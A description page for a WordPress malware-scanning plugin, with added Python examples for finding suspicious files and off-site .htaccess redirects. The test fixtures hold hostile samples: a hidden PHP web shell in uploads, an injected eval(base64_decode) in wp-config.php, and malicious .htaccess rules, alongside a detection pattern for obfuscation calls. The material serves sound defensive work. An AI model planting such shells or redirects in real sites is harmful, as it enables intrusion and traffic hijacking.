WP-MalWatch – Plugin

Author: OrangeCast

WP-MalWatch is a WordPress security scanner plugin designed to alert you when attackers have been at work inside your blog.

When attackers break into a blog, one of the first things they normally do is plant hidden files and malicious .HTACCESS files in various directories.
WP-MalWatch performs a nightly security scan of your WordPress installation looking for evidence of foul play. If it finds any, a dashboard widget tells you where you should take a closer look. WP-MalWatch's detailed report also gives you a very easy interface for viewing the contents of the flagged files from within WordPress, so you don't have to dig through FTP clients and editors to inspect potential problems.

WP-MalWatch is not a tool that protects your blog from attack. It is a scanning plugin that lets a WP admin identify suspicious files in a blog installation and provides a simple viewer for examining them.

The plugin author claims that the plugin has been tested on blog sites with over 2,000 active users online without impacting server performance.

WP-MalWatch Features:

  • Automated nightly scans with the option to manually invoke.
  • Efficient detection of PHP files in your Uploads directory.
  • Efficient detection of multiple .HTACCESS files in your installation.
  • Detection of files based on configurable file patterns.
  • Detection of hidden files.
  • Detection of configurable keywords in theme files.
  • Detection of base64 calls (for example base64_decode) in key WordPress files.
  • Configurations including turning modules on and off.
  • An easy-to-use viewer for any files detected during a scan.
  • Symbolic link friendly file scanning.
  • Dashboard widget for easy notification.
  • Efficient and high performance scanning.
  • A very well written, modularized plugin architecture for future expansion.
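The following is an added example, not WP-MalWatch's own code, showing how several of the checks in the list above can be implemented as a stand-alone scan of a WordPress directory tree: PHP files under the uploads directory, more than one .htaccess in the installation, hidden (dot-prefixed) files, and base64_decode/eval style calls in a handful of root-level core files. The list of core files, the suspicious function names and the fixture tree written to a temp directory are assumptions made for this example.

```python
"""Minimal WordPress integrity scan modelled on the WP-MalWatch feature list.

Added example, not the plugin's code. Walks an installation directory and
reports PHP files in uploads, extra .htaccess files, hidden files, and
base64/eval style calls in selected core files.
"""
import os
import re
import tempfile

# Root-level files whose contents are grepped; an assumption, not the plugin's list.
KEY_FILES = {"index.php", "wp-config.php", "wp-settings.php", "wp-load.php"}
# Obfuscation/eval idioms commonly seen in injected PHP (assumed pattern list).
SUSPICIOUS_CALL = re.compile(r"\b(base64_decode|eval|gzinflate|str_rot13)\s*\(", re.I)
UPLOADS_PREFIX = "wp-content/uploads/"


def scan(root):
    """Return a sorted list of (finding_type, relative_path) for the tree at root."""
    findings = []
    htaccess_files = []
    # followlinks=False (os.walk's default) keeps a symlink loop from recursing forever.
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        for d in dirnames:
            if d.startswith("."):
                rel = os.path.normpath(os.path.join(rel_dir, d)).replace(os.sep, "/")
                findings.append(("hidden_dir", rel))
        for name in filenames:
            rel = os.path.normpath(os.path.join(rel_dir, name)).replace(os.sep, "/")
            if name == ".htaccess":
                htaccess_files.append(rel)      # counted below, not hidden-file noise
            elif name.startswith("."):
                findings.append(("hidden_file", rel))
            if name.lower().endswith(".php") and rel.startswith(UPLOADS_PREFIX):
                findings.append(("php_in_uploads", rel))
            if rel_dir == "." and name in KEY_FILES:
                with open(os.path.join(dirpath, name), errors="replace") as fh:
                    if SUSPICIOUS_CALL.search(fh.read()):
                        findings.append(("encoded_call", rel))
    # A single root .htaccess is normal; any additional one deserves a look.
    if len(htaccess_files) > 1:
        findings.extend(("extra_htaccess", p) for p in htaccess_files)
    return sorted(findings)


def build_fixture():
    """Write a small, constructed WordPress-like tree into a temp dir; return its path."""
    root = tempfile.mkdtemp(prefix="wp-malwatch-demo-")
    files = {  # constructed sample content, not real WordPress files
        "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
        "wp-config.php": "<?php define('DB_NAME', 'wp');\n@eval(base64_decode('AAAA')); // injected\n",
        ".htaccess": "RewriteEngine On\n",
        "wp-content/uploads/2024/01/photo.jpg": "not really a jpeg\n",
        "wp-content/uploads/2024/01/.cache.php": "<?php @eval($_POST['c']);\n",
        "wp-content/uploads/.htaccess": "AddType application/x-httpd-php .jpg\n",
        "wp-content/plugins/example-plugin/example-plugin.php": "<?php // plugin bootstrap\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


def demo():
    """Scan the constructed fixture and return the findings list."""
    return scan(build_fixture())


if __name__ == "__main__":
    for kind, path in demo():
        print(f"{kind:15s} {path}")
```

Run against the fixture, the scan flags the injected eval in wp-config.php, both .htaccess files, and the dot-prefixed PHP file in uploads twice (once as hidden, once as PHP-in-uploads), while the legitimate index.php, plugin file and image produce nothing. Pointing scan() at a real installation root gives the same kind of list; the hidden-directory check also catches dot-directories the feature list does not mention.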

Installation:

a) Upload the 'wp-malware' folder to the /wp-content/plugins/ directory.
b) Activate the plugin through the 'Plugins' menu in WordPress.

PHP4 IS NOT supported and will produce an activation error.

Sub-domain installations and "One Click" installations have been found to put a fully qualified file system path in the "Miscellaneous -> Store Uploads In This Folder" setting. The default is "wp-content/uploads". WP-MalWatch WILL NOT activate if the uploads folder is not set to the default value.

WP-MalWatch runs only once a night, so it detects strange behaviour in your WP blog after the fact rather than blocking it.

How do I know if an .HTACCESS file found in a plugin directory is malicious?

View it in the detailed report and read it. If it implements a 301 redirect to a site that doesn't look right, you have a problem. If it only does basic configuration for the plugin's own directory (for example, restricting direct access to the plugin's files), you are likely OK.
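As an added example (not part of WP-MalWatch) of applying the rule of thumb above mechanically, the script below reads an .htaccess file and flags Redirect/RewriteRule directives whose target is on a host other than the blog's own. It also notes when such a rule is guarded by a RewriteCond on the referer or user agent, the conditional redirect that typically sends only search-engine visitors off-site. The two sample .htaccess contents and the host names are constructed.

```python
"""Triage an .htaccess file for off-site redirects. Added example, not the plugin's code."""
import re
from urllib.parse import urlparse

REDIRECT_RE = re.compile(r"(?i)^(Redirect(?:Match|Permanent)?|RewriteRule)\s+(.*)$")
# Only referer/user-agent conditions are tracked; they are what make a redirect selective.
COND_RE = re.compile(r"(?i)^RewriteCond\s+(%\{HTTP_REFERER\}|%\{HTTP_USER_AGENT\})")


def external_redirects(htaccess_text, site_host):
    """Return (directive, target_url, conditional) for each redirect that leaves site_host."""
    hits = []
    pending_conds = []              # RewriteCond lines accumulate until the next RewriteRule
    site_host = site_host.lower()
    for raw in htaccess_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        cond = COND_RE.match(line)
        if cond:
            pending_conds.append(cond.group(1))
            continue
        m = REDIRECT_RE.match(line)
        if not m:
            continue
        directive, rest = m.groups()
        if directive.lower() == "rewriterule":
            conditional = bool(pending_conds)
            pending_conds = []      # conditions apply only to the RewriteRule that follows them
        else:
            conditional = False
        for token in rest.split():
            if not token.lower().startswith(("http://", "https://")):
                continue
            host = (urlparse(token).hostname or "").lower()
            if host != site_host and not host.endswith("." + site_host):
                hits.append((directive, token, conditional))
    return hits


# Constructed sample: the kind of .htaccess a plugin ships to hide its internals.
BENIGN = r"""
# keep direct requests away from plugin internals
Options -Indexes
<Files ~ "\.(php|inc)$">
    Deny from all
</Files>
Redirect 301 /old-page https://myblog.example/new-page
"""

# Constructed sample: search-engine-referred visitors are bounced to a spam site.
MALICIOUS = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|crawl) [NC]
RewriteRule ^(.*)$ http://cheap-pills.example/land.php?src=$1 [R=301,L]
"""


def verdict(htaccess_text, site_host):
    """Summarise the triage as a short string."""
    hits = external_redirects(htaccess_text, site_host)
    if not hits:
        return "no off-site redirects"
    kinds = ["conditional" if c else "unconditional" for _, _, c in hits]
    return f"{len(hits)} off-site redirect(s): {', '.join(kinds)}"


if __name__ == "__main__":
    print("benign   :", verdict(BENIGN, "myblog.example"))
    print("malicious:", verdict(MALICIOUS, "myblog.example"))
```

A redirect to the blog's own host (or a subdomain of it) is left alone, so the plugin-style file produces no findings, while the conditional rule in the second sample is reported with its target URL. The referer/user-agent condition is worth surfacing because an admin browsing the site directly would never see the redirect fire.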

If you receive an error saying that the plugin had a fatal exception expecting a T_STRING on line 12, then you are running PHP4 on your web server. You should upgrade to PHP 5.